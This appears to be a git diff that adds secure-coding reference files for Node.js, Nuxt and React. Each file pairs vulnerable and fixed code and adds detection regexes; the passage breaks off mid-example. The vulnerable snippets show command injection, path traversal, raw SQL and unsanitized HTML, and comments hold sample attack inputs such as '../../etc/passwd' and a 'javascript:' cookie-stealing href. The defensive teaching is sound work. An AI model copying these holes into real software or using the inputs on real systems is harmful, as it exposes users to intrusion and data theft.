+  // Block non-HTTP(S) schemes
+  if (!['http:', 'https:'].includes(url.protocol)) {
+    throw new Error('Only HTTP(S) allowed');
+  }
+
+  // Resolve DNS and check for internal IPs before fetching
+  const { resolve4 } = require('dns/promises');
+  const addresses = await resolve4(url.hostname);
+  for (const addr of addresses) {
+    if (isPrivateIP(addr)) {
+      throw new Error('Internal IP not allowed');
+    }
+  }
+
+  return fetch(urlString, {
+    signal: AbortSignal.timeout(5000),
+    redirect: 'manual', // Don't follow redirects to internal URLs
+  });
+}
+```
+
+**Security implication:** Server-side request forgery (CWE-918) allows attackers to use the server as a proxy to access internal services, cloud metadata endpoints, and other resources not directly reachable from the internet. Always validate and restrict outgoing URLs, resolve DNS before fetching, block private IP ranges, and do not follow redirects automatically.
+
+**Detection regex:** `fetch\s*\(\s*req\.(query|params|body)`
+
+---
+
+## Node.js 20+ Features
+
+### 15. Permission Model
+
+Node.js 20 introduced an experimental Permission Model that restricts access to the filesystem, child processes, and worker threads at the runtime level.
+
+```bash
+# SECURE: Restrict filesystem access to only the app directory
+node --experimental-permission --allow-fs-read=/app --allow-fs-write=/app/data server.js
+
+# SECURE: Allow only specific command execution
+node --experimental-permission --allow-child-process server.js
+
+# SECURE: Read-only mode — no filesystem writes at all
+node --experimental-permission --allow-fs-read=* server.js
+
+# SECURE: Deny all — no fs, no child_process, no worker_threads
+node --experimental-permission server.js
+# Any fs.readFile, child_process.exec, or new Worker() will throw ERR_ACCESS_DENIED
+```
+
+```javascript
+// Runtime permission check (Node.js 20+)
+const { permission } = require('node:process');
+
+// Check if a specific permission is granted
+if (process.permission.has('fs.read', '/etc/passwd')) {
+  console.log('WARNING: Process can read /etc/passwd');
+}
+
+if (process.permission.has('child.process')) {
+  console.log('WARNING: Process can spawn child processes');
+}
+
+// SECURE: Use permission model to enforce least privilege
+// Start server with only the permissions it needs:
+// node --experimental-permission \
+//   --allow-fs-read=/app \
+//   --allow-fs-write=/app/uploads \
+//   --allow-fs-write=/tmp \
+//   server.js
+```
+
+**Security implication:** The Permission Model provides defense in depth (CWE-250, principle of least privilege). Even if an attacker achieves code execution through an injection vulnerability, the Permission Model limits what operations they can perform. This significantly reduces the blast radius of vulnerabilities.
+
+**Detection regex:** `--experimental-permission|--allow-fs-(read|write)|--allow-child-process`
+
+---
+
+## Node.js 22+ Features
+
+### 16. `require(esm)` and Dynamic Import Security
+
+Node.js 22 stabilized `require()` support for ES modules, and dynamic `import()` expressions have been available since Node.js 13.2. Both can be vectors for loading untrusted code when the specifier comes from user input.
+
+```javascript
+// VULNERABLE: Dynamic import with user-controlled specifier
+app.get('/widget/:name', async (req, res) => {
+  const widget = await import(`./widgets/${req.params.name}.js`);
+  // Attacker: name=../../../etc/passwd — import error leaks path info
+  // Attacker: name=../node_modules/malicious-pkg/index — loads arbitrary package
+  res.json(widget.default());
+});
+
+// VULNERABLE: require(esm) with user input (Node.js 22+)
+const mod = require(`./plugins/${req.query.plugin}.mjs`);
+
+// SECURE: Allowlist with static imports
+const WIDGETS = {
+  chart: () => import('./widgets/chart.js'),
+  table: () => import('./widgets/table.js'),
+  map: () => import('./widgets/map.js'),
+};
+
+app.get('/widget/:name', async (req, res) => {
+  const loader = WIDGETS[req.params.name];
+  if (!loader) {
+    return res.status(404).send('Widget not found');
+  }
+  const widget = await loader();
+  res.json(widget.default());
+});
+
+// SECURE: Import assertions for JSON modules (prevents code execution)
+const config = await import('./config.json', { with: { type: 'json' } });
+```
+
+**Security implication:** Arbitrary code execution (CWE-94) through dynamic module loading. Both `require()` and `import()` execute code at load time. Dynamic specifiers from user input allow loading arbitrary files. Use allowlists mapping user input to static import paths. Import assertions (`with: { type: 'json' }`) ensure JSON files are not executed as code.
+
+**Detection regex:** `import\s*\(\s*[^'"]\s*[+\`]`
+
+---
+
+## Detection Patterns for Auditing Node.js Security
+
+| Pattern | Regex | Severity | Checkpoint ID |
+|---------|-------|----------|---------------|
+| Command injection via exec | `child_process.*exec\(` | error | SA-NODE-01 |
+| fs operations with user input | `fs\.(readFile\|writeFile\|readdir\|unlink).*req\.(query\|params\|body)` | error | SA-NODE-02 |
+| vm/vm2 sandbox usage | `require\s*\(\s*['"]vm2?['"]\s*\)` | error | SA-NODE-03 |
+| Buffer.allocUnsafe usage | `Buffer\.(allocUnsafe\|allocUnsafeSlow)\s*\(` | warning | SA-NODE-04 |
+| Dynamic require with user input | `require\s*\(\s*[^'"]\s*[+\x60]` | error | SA-NODE-05 |
+| Sync crypto in request handler | `(hashSync\|compareSync\|pbkdf2Sync\|scryptSync)\s*\(` | warning | SA-NODE-06 |
+| HTTP header injection | `res\.(setHeader\|writeHead)\s*\([^)]*req\.(query\|params\|body)` | error | SA-NODE-07 |
+| Math.random for security | `Math\.random\s*\(` | warning | SA-NODE-08 |
+| http.createServer without timeouts | `http\.createServer\s*\(` | warning | SA-NODE-09 |
+| Prototype pollution via merge | `__proto__\|Object\.assign\s*\([^,]+,\s*req\.(body\|query)` | error | SA-NODE-10 |
+| SSRF via fetch with user URL | `fetch\s*\(\s*req\.(query\|params\|body)` | error | SA-NODE-11 |
+| Weak crypto hash algorithms | `createHash\s*\(\s*['"]md5['"]` | warning | SA-NODE-12 |
+| eval() usage | `\beval\s*\(` | error | SA-NODE-13 |
+| Dynamic import with user input | `import\s*\(\s*[^'"]\s*[+\x60]` | error | SA-NODE-14 |
+| new Function() constructor | `new\s+Function\s*\(` | error | SA-NODE-15 |
+
+## Version Adoption Security Checklist
+
+- [ ] Upgrade to Node.js 18+ for built-in header injection protection
+- [ ] Replace `node-fetch` with built-in `fetch` and add SSRF validation
+- [ ] Add `--experimental-permission` flags in production (Node.js 20+)
+- [ ] Replace `Math.random()` with `crypto.randomUUID()` or `crypto.randomBytes()`
+- [ ] Replace `Buffer.allocUnsafe` with `Buffer.alloc` unless performance-critical and fully overwritten
+- [ ] Replace `exec`/`execSync` with `execFile`/`spawn` + argument arrays
+- [ ] Remove `vm2` dependency (deprecated, multiple CVEs)
+- [ ] Add `AbortController` timeouts to all outgoing HTTP requests
+- [ ] Set `server.headersTimeout`, `server.requestTimeout`, and body size limits
+- [ ] Use `node:test` for security tests to reduce test dependency surface
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `cwe-top25.md` — CWE Top 25 mapping
+- `input-validation.md` — Input validation patterns
+- `javascript-security-features.md` — Browser/client-side JavaScript patterns
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 3 |

--- a/skills/security-audit/references/nodejs-security-features.md
+++ b/skills/security-audit/references/nodejs-security-features.md
@@ -243,10 +243,21 @@ app.post('/login', async (req, res) => {
 // SECURE: Limit input size and use streaming JSON parsers
 app.use(express.json({ limit: '1mb' }));
 
-// SECURE: Avoid constructing RegExp from user input, or use safe-regex
-const safeRegex = require('safe-regex');
-if (!safeRegex(req.query.pattern)) {
-  return res.status(400).send('Invalid pattern');
+// SECURE: Prefer a linear-time engine (google/re2 via the `re2` npm package)
+// over feeding user input to the V8 backtracking RegExp engine. safe-regex
+// is a useful smell-test but known to be bypassable with crafted inputs —
+// it stops the obvious cases, not a determined attacker.
+const RE2 = require('re2');
+try {
+  const compiled = new RE2(req.query.pattern);      // throws if input uses
+  const matches = compiled.match(req.query.subject); // unsupported features
+  res.json({ matches });
+} catch {
+  return res.status(400).send('Invalid or unsupported pattern');
+}
+// Also always enforce a maximum input length before any regex work:
+if (req.query.subject && req.query.subject.length > 10_000) {
+  return res.status(413).send('Input too large');
 }
 ```
 
@@ -705,7 +716,7 @@ if (process.permission.has('child.process')) {
 
 ### 16. `require(esm)` and Dynamic Import Security
 
-Node.js 22 stabilized `require()` support for ES modules, and dynamic `import()` expressions have been available since Node.js 13.2. Both can be vectors for loading untrusted code when the specifier comes from user input.
+`require()` of ES modules is an experimental / flagged feature in Node.js 22 (`--experimental-require-module`), not a stable default — treat it as unreleased for security-critical code. Dynamic `import()` expressions, on the other hand, have been stable since Node.js 13.2. Both can be vectors for loading untrusted code when the specifier comes from user input.
 
 ```javascript
 // VULNERABLE: Dynamic import with user-controlled specifier
@@ -783,7 +794,7 @@ const config = await import('./config.json', { with: { type: 'json' } });
 - `owasp-top10.md` — OWASP Top 10 mapping
 - `cwe-top25.md` — CWE Top 25 mapping
 - `input-validation.md` — Input validation patterns
-- `javascript-security-features.md` — Browser/client-side JavaScript patterns
+- `javascript-typescript-security-features.md` — Browser/client-side JavaScript/TypeScript patterns
 
 ## Changelog
 

--- a/skills/security-audit/references/nuxt-security.md
+++ b/skills/security-audit/references/nuxt-security.md
@@ -1,0 +1,582 @@
+# Nuxt Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for Nuxt 3 applications. Nuxt introduces unique security considerations through its auto-imports, hybrid rendering, Nitro server engine, and the boundary between server and client code. Many vulnerabilities arise from misconfigured runtime config, unprotected server routes, and SSR-specific XSS patterns.
+
+---
+
+## Authentication & Authorization
+
+### SA-NUXT-01: Server Route Auth Bypass
+
+Nitro server routes (`server/api/` and `server/routes/`) are publicly accessible HTTP endpoints. Without explicit auth middleware, any client can invoke them directly.
+
+```typescript
+// VULNERABLE: No auth check in server API route
+// server/api/users.get.ts
+export default defineEventHandler(async (event) => {
+  const users = await db.user.findMany();
+  return users; // anyone can list all users including sensitive fields
+});
+
+// VULNERABLE: Delete endpoint without auth
+// server/api/users/[id].delete.ts
+export default defineEventHandler(async (event) => {
+  const id = getRouterParam(event, 'id');
+  await db.user.delete({ where: { id } });
+  return { success: true };
+});
+
+// VULNERABLE: Admin endpoint without role check
+// server/api/admin/settings.post.ts
+export default defineEventHandler(async (event) => {
+  const body = await readBody(event);
+  await updateSettings(body);
+  return { success: true };
+});
+```
+
+```typescript
+// SECURE: Auth middleware applied to server routes
+// server/middleware/auth.ts
+export default defineEventHandler(async (event) => {
+  const protectedPaths = ['/api/admin', '/api/users'];
+  const path = getRequestURL(event).pathname;
+
+  if (protectedPaths.some((p) => path.startsWith(p))) {
+    const session = await getUserSession(event);
+    if (!session?.user) {
+      throw createError({ statusCode: 401, message: 'Unauthorized' });
+    }
+    event.context.user = session.user;
+  }
+});
+
+// SECURE: Auth + role check in handler
+// server/api/admin/settings.post.ts
+export default defineEventHandler(async (event) => {
+  const user = event.context.user;
+  if (!user || user.role !== 'admin') {
+    throw createError({ statusCode: 403, message: 'Forbidden' });
+  }
+
+  const body = await readValidatedBody(event, settingsSchema.parse);
+  await updateSettings(body);
+  return { success: true };
+});
+
+// SECURE: Input validation with zod
+// server/api/users/[id].delete.ts
+import { z } from 'zod';
+
+export default defineEventHandler(async (event) => {
+  const user = event.context.user;
+  if (!user || user.role !== 'admin') {
+    throw createError({ statusCode: 403, message: 'Forbidden' });
+  }
+
+  const id = z.string().uuid().parse(getRouterParam(event, 'id'));
+  await db.user.delete({ where: { id } });
+  return { success: true };
+});
+```
+
+**Detection regex:** `defineEventHandler\s*\(\s*async\s*\(\s*event\s*\)`
+**Severity:** warning
+
+---
+
+### SA-NUXT-07: Middleware Auth Patterns
+
+Nuxt route middleware (`middleware/`) runs before page rendering but only on the client after initial SSR. Relying solely on client middleware for auth is insecure because server routes remain unprotected, and middleware can be bypassed via direct navigation.
+
+```typescript
+// VULNERABLE: Client-only middleware for auth
+// middleware/auth.ts
+export default defineNuxtRouteMiddleware((to, from) => {
+  const { loggedIn } = useUserSession();
+  if (!loggedIn.value) {
+    return navigateTo('/login');
+  }
+  // Only runs in browser — server-side requests bypass this entirely
+});
+
+// VULNERABLE: Auth check that doesn't protect server data
+// middleware/admin.ts
+export default defineNuxtRouteMiddleware((to) => {
+  const user = useUser();
+  if (user.value?.role !== 'admin') {
+    return navigateTo('/');
+  }
+  // Page data is still fetched on the server without auth check
+});
+```
+
+```typescript
+// SECURE: Server middleware for API protection + client middleware for UX
+// server/middleware/auth.ts (protects API routes)
+export default defineEventHandler(async (event) => {
+  if (getRequestURL(event).pathname.startsWith('/api/protected')) {
+    const session = await getUserSession(event);
+    if (!session) {
+      throw createError({ statusCode: 401, message: 'Unauthorized' });
+    }
+    event.context.user = session.user;
+  }
+});
+
+// middleware/auth.ts (client UX redirect)
+export default defineNuxtRouteMiddleware(async (to) => {
+  const { loggedIn, fetch: fetchSession } = useUserSession();
+  await fetchSession(); // re-verify session
+  if (!loggedIn.value) {
+    return navigateTo('/login');
+  }
+});
+
+// SECURE: Global middleware with server-side auth
+// middleware/auth.global.ts
+export default defineNuxtRouteMiddleware(async (to) => {
+  const protectedRoutes = ['/dashboard', '/admin', '/settings'];
+  if (!protectedRoutes.some((r) => to.path.startsWith(r))) return;
+
+  const { loggedIn } = useUserSession();
+  if (!loggedIn.value) {
+    return navigateTo(`/login?redirect=${encodeURIComponent(to.fullPath)}`);
+  }
+});
+```
+
+**Detection regex:** `defineNuxtRouteMiddleware\s*\(`
+**Severity:** info
+
+---
+
+## Data Exposure
+
+### SA-NUXT-02: useAsyncData / useFetch Data Exposure to Client
+
+Data fetched with `useAsyncData` or `useFetch` in Nuxt pages and components is serialized and sent to the client as part of the hydration payload. Fetching sensitive server-side data through these composables exposes it in the HTML source.
+
+```typescript
+// VULNERABLE: Full user record including sensitive fields
+// pages/admin/users.vue
+<script setup>
+const { data: users } = await useFetch('/api/admin/users');
+// users includes: passwordHash, ssn, salary — all in HTML payload
+</script>
+
+<template>
+  <div v-for="user in users" :key="user.id">
+    {{ user.name }}
+  </div>
+</template>
+
+// VULNERABLE: Internal API response with debug info
+<script setup>
+const { data } = await useAsyncData('config', () =>
+  $fetch('/api/internal/config')
+);
+// config includes: dbConnectionString, apiKeys, debug flags
+</script>
+
+// VULNERABLE: Sensitive data in transform but still in payload
+<script setup>
+const { data } = await useFetch('/api/users/me', {
+  transform: (user) => {
+    // transform runs client-side too — raw data is in payload
+    return { name: user.name };
+  },
+});
+</script>
+```
+
+```typescript
+// SECURE: Server API returns only needed fields
+// server/api/admin/users.get.ts
+export default defineEventHandler(async (event) => {
+  const user = event.context.user;
+  if (!user || user.role !== 'admin') {
+    throw createError({ statusCode: 403 });
+  }
+
+  return await db.user.findMany({
+    select: { id: true, name: true, email: true, role: true },
+  });
+});
+
+// pages/admin/users.vue
+<script setup>
+const { data: users } = await useFetch('/api/admin/users');
+// Only safe fields returned from API
+</script>
+
+// SECURE: Use server-only utils for sensitive operations
+// server/utils/getFullUser.ts (never sent to client)
+export async function getFullUser(id: string) {
+  return await db.user.findUnique({ where: { id } });
+}
+
+// SECURE: pick option to limit payload fields
+<script setup>
+const { data } = await useFetch('/api/users/me', {
+  pick: ['name', 'email', 'avatarUrl'],
+});
+</script>
+```
+
+**Detection regex:** `useFetch\s*\(\s*['"][^'"]*admin|useAsyncData\s*\(\s*['"][^'"]*secret`
+**Severity:** warning
+
+---
+
+### SA-NUXT-03: runtimeConfig vs appConfig Secrets Leakage
+
+Nuxt's `runtimeConfig` has a `public` key that is exposed to the client. Placing secrets in `runtimeConfig.public` or in `appConfig` (which is always public) exposes them to every visitor.
+
+```typescript
+// VULNERABLE: Secrets in public runtimeConfig
+// nuxt.config.ts
+export default defineNuxtConfig({
+  runtimeConfig: {
+    public: {
+      apiSecret: 'sk_live_abc123',           // exposed to client!
+      databaseUrl: 'postgres://user:pass@host/db', // exposed!
+      stripeSecretKey: 'sk_live_def456',      // exposed!
+    },
+  },
+});
+
+// VULNERABLE: Secrets in appConfig (always public)
+// app.config.ts
+export default defineAppConfig({
+  apiKey: 'sk_live_abc123', // always sent to client
+  jwtSecret: 'my-secret',  // always sent to client
+});
+
+// VULNERABLE: Accessing private config in client component
+// composables/useApi.ts
+export function useApi() {
+  const config = useRuntimeConfig();
+  // config.secretApiKey is undefined on client but attempt reveals intent
+  return $fetch('/api/data', {
+    headers: { Authorization: config.public.apiSecret },
+  });
+}
+```
+
+```typescript
+// SECURE: Private secrets in runtimeConfig root (server-only)
+// nuxt.config.ts
+export default defineNuxtConfig({
+  runtimeConfig: {
+    // Server-only (not exposed to client)
+    databaseUrl: process.env.DATABASE_URL,
+    stripeSecretKey: process.env.STRIPE_SECRET_KEY,
+    jwtSecret: process.env.JWT_SECRET,
+
+    // Client-safe public values
+    public: {
+      appUrl: process.env.APP_URL || 'https://myapp.com',
+      stripePublishableKey: process.env.STRIPE_PUBLISHABLE_KEY,
+    },
+  },
+});
+
+// SECURE: Access private config only in server routes
+// server/api/payment.post.ts
+export default defineEventHandler(async (event) => {
+  const config = useRuntimeConfig(event);
+  const stripe = new Stripe(config.stripeSecretKey); // server-only
+  // ...
+});
+
+// SECURE: appConfig for non-sensitive UI configuration only
+// app.config.ts
+export default defineAppConfig({
+  theme: { primaryColor: '#3b82f6' },
+  ui: { rounded: 'lg' },
+});
+```
+
+**Detection regex:** `runtimeConfig[\s\S]*?public\s*:\s*\{[^}]*(secret|password|token|key|credential|private|database)`
+**Severity:** error
+
+---
+
+## Cross-Site Scripting (XSS)
+
+### SA-NUXT-04: SSR-Specific XSS via v-html
+
+The `v-html` directive renders raw HTML and bypasses Vue's auto-escaping. In SSR context, this is especially dangerous because the XSS payload is rendered into the initial HTML response, executing before any client-side framework code loads.
+
+```vue
+<!-- VULNERABLE: User input rendered as raw HTML -->
+<template>
+  <div v-html="userComment" />
+</template>
+
+<script setup>
+const props = defineProps<{ userComment: string }>();
+</script>
+
+<!-- VULNERABLE: Markdown rendered without sanitization -->
+<template>
+  <article v-html="renderedMarkdown" />
+</template>
+
+<script setup>
+import { marked } from 'marked';
+const props = defineProps<{ content: string }>();
+const renderedMarkdown = computed(() => marked(props.content));
+</script>
+
+<!-- VULNERABLE: CMS content rendered as HTML -->
+<template>
+  <div v-html="page.body" />
+</template>
+
+<script setup>
+const { data: page } = await useFetch(`/api/pages/${route.params.slug}`);
+</script>
+```
+
+```vue
+<!-- SECURE: Use text interpolation (auto-escaped) -->
+<template>
+  <div>{{ userComment }}</div>
+</template>
+
+<!-- SECURE: Sanitize HTML before rendering -->
+<template>
+  <div v-html="sanitizedHtml" />
+</template>
+
+<script setup>
+import DOMPurify from 'isomorphic-dompurify';
+
+const props = defineProps<{ content: string }>();
+const sanitizedHtml = computed(() => DOMPurify.sanitize(props.content));
+</script>
+
+<!-- SECURE: Use a Vue-aware markdown component -->
+<template>
+  <ContentRenderer :value="page" />
+</template>
+
+<script setup>
+// Use @nuxt/content for safe markdown rendering
+const { data: page } = await useAsyncData(() =>
+  queryContent(route.params.slug).findOne()
+);
+</script>
+```
+
+**Detection regex:** `v-html\s*=`
+**Severity:** warning
+
+---
+
+## Server Security
+
+### SA-NUXT-05: Nitro Server Handler Security
+
+Nitro server handlers have direct access to the Node.js runtime. Improper input handling in handlers can lead to path traversal, command injection, or denial of service.
+
+```typescript
+// VULNERABLE: Path traversal in file handler
+// server/api/files/[...path].get.ts
+import { readFileSync } from 'fs';
+import { join } from 'path';
+
+export default defineEventHandler((event) => {
+  const filePath = getRouterParam(event, 'path');
+  const content = readFileSync(join('/data', filePath!), 'utf-8');
+  // Attacker: /api/files/../../etc/passwd
+  return content;
+});
+
+// VULNERABLE: Command injection via query parameter
+// server/api/ping.get.ts
+import { exec } from 'child_process';
+
+export default defineEventHandler((event) => {
+  const host = getQuery(event).host;
+  return new Promise((resolve) => {
+    exec(`ping -c 1 ${host}`, (err, stdout) => {
+      resolve(stdout);
+    });
+  });
+});
+
+// VULNERABLE: Unvalidated body used in database query
+// server/api/search.post.ts
+export default defineEventHandler(async (event) => {
+  const { query } = await readBody(event);
+  const results = await db.$queryRawUnsafe(`SELECT * FROM items WHERE name LIKE '%${query}%'`);
+  return results;
+});
+```
+
+```typescript
+// SECURE: Validate and sanitize file paths
+// server/api/files/[...path].get.ts
+import { readFile } from 'fs/promises';
+import { join, resolve, normalize } from 'path';
+
+const DATA_DIR = resolve('/data');
+
+export default defineEventHandler(async (event) => {
+  const filePath = getRouterParam(event, 'path');
+  if (!filePath) throw createError({ statusCode: 400 });
+
+  const resolved = resolve(DATA_DIR, normalize(filePath));
+  if (!resolved.startsWith(DATA_DIR)) {
+    throw createError({ statusCode: 403, message: 'Access denied' });
+  }
+
+  try {
+    const content = await readFile(resolved, 'utf-8');
+    return content;
+  } catch {
+    throw createError({ statusCode: 404 });
+  }
+});
+
+// SECURE: Use parameterized queries
+// server/api/search.post.ts
+export default defineEventHandler(async (event) => {
+  const body = await readValidatedBody(event, searchSchema.parse);
+  const results = await db.item.findMany({
+    where: { name: { contains: body.query } },
+    take: 50,
+  });
+  return results;
+});
+
+// SECURE: Avoid shell commands; use libraries
+// server/api/ping.get.ts
+import { isIP } from 'net';
+
+export default defineEventHandler((event) => {
+  const host = getQuery(event).host as string;
+  if (!host || !isIP(host)) {
+    throw createError({ statusCode: 400, message: 'Invalid host' });
+  }
+  // Use a network library instead of shell exec
+  return { host, status: 'validated' };
+});
+```
+
+**Detection regex:** `exec\s*\(|execSync\s*\(|\$queryRawUnsafe\s*\(`
+**Severity:** error
+
+---
+
+## Configuration
+
+### SA-NUXT-06: Plugin Execution Order Risks
+
+Nuxt plugins execute in filesystem order by default. Security-critical plugins (auth initialization, CSRF setup) that depend on execution order can be bypassed if another plugin runs first and modifies global state.
+
+```typescript
+// VULNERABLE: Auth plugin relies on implicit order
+// plugins/auth.ts (runs after analytics.ts alphabetically)
+export default defineNuxtPlugin((nuxtApp) => {
+  const { session } = useUserSession();
+  // If analytics.ts already made API calls, they ran without auth
+});
+
+// VULNERABLE: CSRF plugin that might run too late
+// plugins/csrf.ts
+export default defineNuxtPlugin((nuxtApp) => {
+  nuxtApp.hook('app:created', () => {
+    const token = useCookie('csrf-token');
+    // Other plugins may have already made fetch calls without CSRF
+  });
+});
+
+// VULNERABLE: Plugin modifies global fetch without protection
+// plugins/api.ts
+export default defineNuxtPlugin(() => {
+  globalThis.$fetch = $fetch.create({
+    baseURL: '/api',
+    // No auth headers — all API calls go unauthenticated
+  });
+});
+```
+
+```typescript
+// SECURE: Explicit plugin ordering with enforce
+// plugins/01.auth.ts
+export default defineNuxtPlugin({
+  name: 'auth',
+  enforce: 'pre', // runs before other plugins
+  async setup(nuxtApp) {
+    const { fetch: fetchSession } = useUserSession();
+    await fetchSession();
+  },
+});
+
+// SECURE: Depend on named plugins
+// plugins/02.api.ts
+export default defineNuxtPlugin({
+  name: 'api',
+  dependsOn: ['auth'], // explicit dependency
+  setup() {
+    const { session } = useUserSession();
+    const api = $fetch.create({
+      baseURL: '/api',
+      onRequest({ options }) {
+        if (session.value?.token) {
+          options.headers.set('Authorization', `Bearer ${session.value.token}`);
+        }
+      },
+    });
+    return { provide: { api } };
+  },
+});
+
+// SECURE: Use numbered prefix for clear ordering
+// plugins/00.csrf.ts
+export default defineNuxtPlugin({
+  name: 'csrf',
+  enforce: 'pre',
+  setup(nuxtApp) {
+    const csrfToken = useCookie('csrf-token');
+    nuxtApp.hook('app:created', () => {
+      // CSRF setup runs before any other plugin
+    });
+  },
+});
+```
+
+**Detection regex:** `defineNuxtPlugin\s*\(\s*(?:async\s*)?\(\s*nuxtApp\s*\)\s*=>`
+**Severity:** info
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SA-NUXT-01: Server route auth bypass | Critical | Immediate | Medium |
+| SA-NUXT-02: useAsyncData/useFetch data exposure | High | 1 week | Medium |
+| SA-NUXT-03: runtimeConfig secrets leakage | Critical | Immediate | Low |
+| SA-NUXT-04: v-html SSR XSS | High | Immediate | Low |
+| SA-NUXT-05: Nitro handler injection | Critical | Immediate | Medium |
+| SA-NUXT-06: Plugin execution order risks | Low | 1 month | Medium |
+| SA-NUXT-07: Middleware auth patterns | Medium | 1 week | Medium |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `javascript-typescript-security-features.md` — Language-level patterns
+- `frontend-security.md` — General frontend security patterns
+- `nodejs-security-features.md` — Node.js runtime patterns
+- `api-security.md` — API security patterns
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 8 |

--- a/skills/security-audit/references/react-security.md
+++ b/skills/security-audit/references/react-security.md
@@ -1,0 +1,641 @@
+# React Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for React applications. React provides some built-in XSS protection through JSX auto-escaping, but developers can bypass these protections or introduce new vulnerability classes through unsafe APIs, unvetted dependencies, and improper state management.
+
+---
+
+## Cross-Site Scripting (XSS)
+
+### SA-REACT-01: dangerouslySetInnerHTML Misuse
+
+The `dangerouslySetInnerHTML` API bypasses React's built-in XSS protection by injecting raw HTML into the DOM. When used with unsanitized user input, it creates a direct XSS vector.
+
+```jsx
+// VULNERABLE: User input rendered as raw HTML
+function Comment({ userComment }) {
+  return (
+    <div dangerouslySetInnerHTML={{ __html: userComment }} />
+  );
+}
+
+// VULNERABLE: Fetched data rendered without sanitization
+function Article({ content }) {
+  return (
+    <div dangerouslySetInnerHTML={{ __html: content }} />
+  );
+}
+
+// VULNERABLE: Markdown-to-HTML conversion without sanitization
+function MarkdownRenderer({ markdown }) {
+  const html = marked(markdown); // raw HTML from user markdown
+  return <div dangerouslySetInnerHTML={{ __html: html }} />;
+}
+```
+
+```jsx
+// SECURE: Use a sanitization library before rendering
+import DOMPurify from 'dompurify';
+
+function Comment({ userComment }) {
+  const sanitized = DOMPurify.sanitize(userComment);
+  return (
+    <div dangerouslySetInnerHTML={{ __html: sanitized }} />
+  );
+}
+
+// SECURE: Use a React-aware markdown renderer
+import ReactMarkdown from 'react-markdown';
+
+function MarkdownRenderer({ markdown }) {
+  return <ReactMarkdown>{markdown}</ReactMarkdown>;
+}
+
+// SECURE: Render text content directly (auto-escaped by React)
+function Comment({ userComment }) {
+  return <div>{userComment}</div>;
+}
+```
+
+**Detection regex:** `dangerouslySetInnerHTML`
+**Severity:** warning
+
+---
+
+### SA-REACT-02: JSX Expression Injection via User-Controlled Props
+
+When user-controlled data flows into JSX props that accept React elements or render functions, attackers can inject arbitrary components or scripts. This is especially dangerous with spread operators and dynamic component rendering.
+
+```jsx
+// VULNERABLE: Spreading user-controlled object as props
+function DynamicComponent({ userProps }) {
+  return <div {...userProps} />;
+}
+// Attacker passes: { dangerouslySetInnerHTML: { __html: '<script>...' } }
+
+// VULNERABLE: Dynamic component name from user input
+function RenderComponent({ componentName, data }) {
+  const Component = components[componentName];
+  return <Component {...data} />;
+}
+
+// VULNERABLE: User-controlled ref callback
+function Input({ onRef }) {
+  return <input ref={onRef} />;
+}
+```
+
+```jsx
+// SECURE: Whitelist allowed props
+function DynamicComponent({ userProps }) {
+  const allowedProps = ['className', 'id', 'title', 'aria-label'];
+  const safeProps = Object.fromEntries(
+    Object.entries(userProps).filter(([key]) => allowedProps.includes(key))
+  );
+  return <div {...safeProps} />;
+}
+
+// SECURE: Whitelist allowed components
+const ALLOWED_COMPONENTS = { Alert, Card, Badge };
+
+function RenderComponent({ componentName, data }) {
+  const Component = ALLOWED_COMPONENTS[componentName];
+  if (!Component) return null;
+  return <Component {...data} />;
+}
+
+// SECURE: Use controlled ref pattern
+function Input({ inputRef }) {
+  return <input ref={inputRef} />;
+}
+```
+
+**Detection regex:** `\{\s*\.\.\.(?:user|props|data|input|params|query)`
+**Severity:** warning
+
+---
+
+### SA-REACT-03: javascript: Protocol in href
+
+React does not block `javascript:` URIs in `href` attributes. When user-controlled data is used as an `href`, attackers can inject `javascript:` URLs to execute arbitrary code when the link is clicked.
+
+```jsx
+// VULNERABLE: User-controlled href without validation
+function UserLink({ url }) {
+  return <a href={url}>Click here</a>;
+}
+// Attacker passes: "javascript:alert(document.cookie)"
+
+// VULNERABLE: href from API response
+function ExternalLink({ link }) {
+  return <a href={link.url}>{link.label}</a>;
+}
+
+// VULNERABLE: Dynamic href construction
+function ProfileLink({ userId, redirect }) {
+  return <a href={redirect || `/user/${userId}`}>Profile</a>;
+}
+```
+
+```jsx
+// SECURE: Validate URL protocol with allowlist
+function UserLink({ url }) {
+  const safeUrl = sanitizeUrl(url);
+  return <a href={safeUrl}>Click here</a>;
+}
+
+function sanitizeUrl(url) {
+  try {
+    const parsed = new URL(url, window.location.origin);
+    if (['http:', 'https:', 'mailto:'].includes(parsed.protocol)) {
+      return parsed.href;
+    }
+    return '#';
+  } catch {
+    return '#';
+  }
+}
+
+// SECURE: Use a validated URL library
+import { sanitizeUrl } from '@braintree/sanitize-url';
+
+function ExternalLink({ link }) {
+  return <a href={sanitizeUrl(link.url)}>{link.label}</a>;
+}
+```
+
+**Detection regex:** `href\s*=\s*\{(?!['"]https?:)(?!['"]mailto:)(?!['"]/)`
+**Severity:** warning
+
+---
+
+## Injection
+
+### SA-REACT-04: Server Component vs Client Component Data Exposure
+
+In React Server Components (RSC), props passed from server to client components are serialized and visible in the client bundle. Passing sensitive data (database records, auth tokens, internal IDs) as props to client components exposes them in the browser.
+
+```jsx
+// VULNERABLE: Passing full database record to client component
+// ServerPage.jsx (server component)
+import UserProfile from './UserProfile';
+
+async function ServerPage() {
+  const user = await db.users.findUnique({ where: { id: userId } });
+  // user contains: { id, name, email, passwordHash, ssn, internalRole }
+  return <UserProfile user={user} />;
+}
+
+// UserProfile.jsx
+'use client';
+export default function UserProfile({ user }) {
+  // user.passwordHash and user.ssn are now in the client bundle!
+  return <div>{user.name}</div>;
+}
+
+// VULNERABLE: Passing auth token to client component
+async function Layout() {
+  const session = await getSession();
+  return <ClientNav session={session} />;
+  // session.refreshToken is now exposed in the browser
+}
+```
+
+```jsx
+// SECURE: Select only needed fields before passing to client
+async function ServerPage() {
+  const user = await db.users.findUnique({
+    where: { id: userId },
+    select: { id: true, name: true, avatarUrl: true }
+  });
+  return <UserProfile user={user} />;
+}
+
+// SECURE: Create a DTO / sanitized object
+async function Layout() {
